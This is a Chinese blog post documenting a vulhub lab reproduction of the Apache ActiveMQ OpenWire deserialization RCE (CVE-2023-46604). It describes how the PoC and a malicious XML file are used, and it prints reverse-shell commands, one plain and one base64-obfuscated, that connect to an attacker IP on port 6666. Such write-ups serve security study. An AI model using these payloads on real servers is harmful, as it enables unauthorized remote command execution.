CVE-2023-46604复现学习

最新推荐文章于 2024-06-03 15:09:52 发布
最新推荐文章于 2024-06-03 15:09:52 发布
阅读量571 收藏 9
点赞数 8
分类专栏: vulhub复现学习合集 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shierbai/article/details/139037925
版权

activemq反序列化RCE漏洞

是OpenWire 协议反序列化命令执行漏洞

教程参考

ActiveMQ反序列化RCE漏洞复现(CVE-2023-46604)_cve-2023-46604复现-CSDN博客

概述

Apache ActiveMQ是一个开源的、功能强大的消息代理(Message Broker),由 Apache Software Foundation 所提供。ActiveMQ 支持 Java Message Service(JMS)1.1 和 2.0规范,提供了一个高性能、简单、灵活和支持多种语言(Java, C, C++, Ruby, Python, Perl等)的消息队列系统。

OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActiveMQ 5.18.2版本及以前,OpenWire协议通信过程中存在一处反序列化漏洞,该漏洞可以允许具有网络访问权限的远程攻击者通过操作 OpenWire 协议中的序列化类类型,导致代理的类路径上的任何类实例化,从而执行任意命令。

影响版本

Apache ActiveMQ <= 5.18.2

复现

把vulhub下poc都复制过来

poc.py的使用参数,ip,port,xml三个参数都需要

可以看到xml里,如果执行成功会执行touch /tmp/activeMQ-RCE-success

在根目录下的tmp文件夹下创建一个名为activeMQ-RCE-success的文件

启动http反连服务器,让我们的xml文件可以被访问到

再打poc

回来靶机查看执行成功

docker-compose exec activemq bash

那么我们可以构造一个反弹shell命令到xml里,然后去打poc

bash -i >& /dev/tcp/攻击者ip/6666 0>&1

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjI0Mi4xLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}

在value下放命令,空格则换行再打一对value标签

打poc

不过我这边报环境不支持终端交互,不过利用这个方法还是可以执行远程代码

shierbai
关注
  • 8
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CraftCMS ConditionsController.php 代码执行漏洞(CVE-2023-41892)
0xSec
05-31 531
CraftCMS在4.4.15版本之前存在远程代码执行漏洞,攻击者可构造恶意请求执行任意代码,控制服务器。
CVE-2023-36025 Windows SmartScreen 安全功能绕过漏洞
cc123489ll的博客
05-31 722
CVE-2023-36025是微软于11月补丁日发布的安全更新中修WindowsSmartScreen安全功能绕过漏洞。攻击者可以通过诱导用户单击特制的URL来利用该漏洞,对目标系统进行攻击。成功利用该漏洞的攻击者能够绕过WindowsDefender SmartScreen检查及其相关提示。该漏洞的攻击杂性较低,可创建并诱导用户点击恶意设计的 Internet 快捷方式文件(.URL) 或指向此类文件的超链接来利用该漏洞,无需特殊权限即可通过互联网进行利用。
Weblogic反序列化漏洞原理分析及漏洞(CVE-2018-2628/CVE-2023-21839)
rumil的博客
09-19 5638
WebLogic 存在远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389),由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。远程方法调用,除了该对象本身的虚拟机,其它的虚拟机也可以调用该对象的方法。
探索Confluence安全漏洞利用:ConfluenceMemshell详解
gitblog_00017的博客
05-31 572
探索Confluence安全漏洞利用:ConfluenceMemshell详解 项目地址:https://gitcode.com/Lotus6/ConfluenceMemshell 1、项目介绍 ConfluenceMemshell 是一个针对Confluence服务器的漏洞利用工具,设计用于利用CVE-2021-26084、CVE-2022-26134以及最新的CVE-2023系列漏洞。这个开源...
如何看待mybatis-plus这个cve漏洞及声明
怀揣梦想,一颗执着于技术的心从未磨灭,内心住着一颗顽强的小强时刻提醒自己层层突破自我,同时也成就他人
05-31 822
该组件在3.5.3.1及之前版本中,由于TenantHandler#getTenantId方法在构造SQL表达式时未对tenant(租户)ID值进行过滤,当程序启用了TenantPlugin并且tenant ID可由外部用户控制时,攻击者可以利用此漏洞进行SQL注入,接管程序的数据库或发送恶意命令。MyBatis-Plus的CVE漏洞是一个严重的问题,但通过及时升级版本、过滤输入和遵循最佳实践等措施,开发者可以有效地降低安全风险并保护系统的安全性。
探索安全漏洞CVE-2023-24055:KeePass 2.5x的预防与应对策略
gitblog_00037的博客
05-25 521
探索安全漏洞CVE-2023-24055:KeePass 2.5x的预防与应对策略 项目地址:https://gitcode.com/alt3kx/CVE-2023-24055_PoC 一、项目介绍 随着密码管理的重要性日益凸显,KeePass因其可靠性和开源性质而备受推崇。然而,最近披露的CVE-2023-24055暴露了其2.5x版本的一个重大安全问题:恶意攻击者能够通过修改配置文件触发数据...
hvv 前网安人必读的漏洞清单(2024年)
2401_84466229的博客
05-28 1750
数字化浪潮席卷全球,安全漏洞的发和利用频率正以惊人的速度上升,尤其是工业自动化、绿色能源、财经领域、交通系统、国家防务以及医疗行业等关键部门,成为了网络攻击者的主要目标。数据侵犯和勒索软件的攻击层出不穷,凸显了安全漏洞正被黑客用作主要的攻击渠道。本文梳理、分析了 2023 年危害巨大、影响范围广泛、且攻击手法多变的漏洞,旨在为网络安全界的实践者们提供一个详细的漏洞信息概览,帮助安全从业者能够更全面地掌握这些安全威胁,并据此构建更为坚固的安全防线。
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具
gitblog_00100的博客
05-25 423
探秘网络安全新星:CVE-2023-4863/CVE-2023-41064 PoC 工具 项目地址:https://gitcode.com/mistymntncop/CVE-2023-4863 在这个数字化的时代,网络安全的重要性不言而喻。为了保障网络的健康和安全,开发者们不断挑战新的漏洞,寻找解决方案。今天,我们将向您推荐一个专注于CVE-2023-4863漏洞的Proof-of-Concept...
20232906 2023-2024-2 《网络与系统攻防技术》第十一次作业
mar-velous的博客
05-27 1130
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。
高危漏洞处置时限/高危漏洞用不用修-零基础漏洞教学
最新发布
2401_84915584的博客
06-03 547
阅读: 965一、漏洞概述12月13日,绿盟科技CERT监测到微软发布12月安全更新补丁,修了34个安全问题
GitLab 高危漏洞可导致账号遭接管
smellycat000的专栏
05-24 190
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士GitLab 修了一个高危漏洞,它可导致未认证攻击者在跨站点脚本攻击中接管用户账户。该漏洞的编号是CVE-2024-4835,是位于VS 代码编辑器 (Web IDE)中的一个XSS弱点,可导致威胁行动者使用恶意构造的页面窃取受限制的信息。虽然攻击者可在无需认证的攻击中利用该漏洞,但仍然需要用户交互,因此增加了攻击的杂性。GitLab 指出,...
Ivanti 修Endpoint Manager 中的严重RCE漏洞
smellycat000的专栏
05-24 210
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士本周二,Ivanti 公司修了位于 Endpoint Manager (EPM) 中的多个严重漏洞,在某些情况下可用于实远程代码执行。Ivanti 本次共修10个漏洞,其中6个即编号为从CVE-2024-29822到CVE-2024-29827(CVSS评分9.6)的漏洞与SQL注入有关,可导致位于同一个网络中的未认证攻击者执行任意代码。余...
cve-2023-36844
01-26
CVE-2023-36844是一种安全漏洞,它影响某个特定的软件或系统。根据CVE命名规则,它是在2023年被发和分配的漏洞编号。 关于CVE-2023-36844漏洞的具体详情,由于缺乏具体信息,我无法提供详细的漏洞描述。通常,CVE漏洞编号用于标识软件或系统中的安全问题,以便用户、开发人员和安全研究人员能够更好地了解漏洞的性质和潜在风险。 如果我要提供有关CVE-2023-36844的建议,我会强烈建议用户尽快更新相关软件或系统,以修这个安全漏洞。此外,我还建议用户保持良好的网络安全实践,包括定期备份数据、注意不明来源的链接和附件、使用强密码以及确保及时应用软件更新和补丁程序。 最重要的是,对于任何潜在的安全漏洞,请保持关注并及时了解相关软件或系统厂商的安全更新和建议。与此同时,如果有任何疑问或需要进一步的帮助,建议寻求专业的安全机构或安全专家的意见。 总之,CVE-2023-36844是一个特定软件或系统的漏洞编号,我建议用户关注更新以及采取必要的网络安全措施以保护个人和组织的信息安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值